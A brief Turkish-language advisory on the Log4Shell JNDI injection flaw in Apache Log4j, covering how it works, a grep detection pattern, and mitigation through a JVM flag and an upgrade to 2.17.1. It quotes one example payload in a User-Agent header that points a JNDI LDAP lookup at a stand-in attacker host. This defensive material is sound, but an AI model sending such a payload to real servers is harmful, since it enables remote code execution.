⚠️ Uyarı: Bu makale yalnızca eğitim amaçlıdır.
Genel Bakış
Güvenlik Açığı Türü: JNDI Injection ile RCE Etki: Kritik (CVSS 10.0) Etkilenen Sistemler: Apache Log4j 2.0-beta9 to 2.14.1
Güvenlik Açığı Nasıl Çalışır?
Log4j, kullanıcı girdisini yorumlayarak harici kaynakları getirebiliyordu:
User-Agent: ${jndi:ldap://saldirgan.com/exploit}
Tespit
# Log dosyalarında istismar girişimlerini ara
grep -E '\$\{jndi:(ldap|rmi|dns)://' /var/log/app/*.log
Azaltma
# Anlık çözüm
java -Dlog4j2.formatMsgNoLookups=true -jar application.jar
<!-- Kalıcı çözüm — Log4j güncelleme -->
<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-core</artifactId>
<version>2.17.1</version>
</dependency>
Temel Çıkarımlar
- Günlük bağlamlarında harici girdiye asla güvenme
- Varlık envanteri tut
- Sanal Yama (WAF kuralları) hızlı yanıt için kritiktir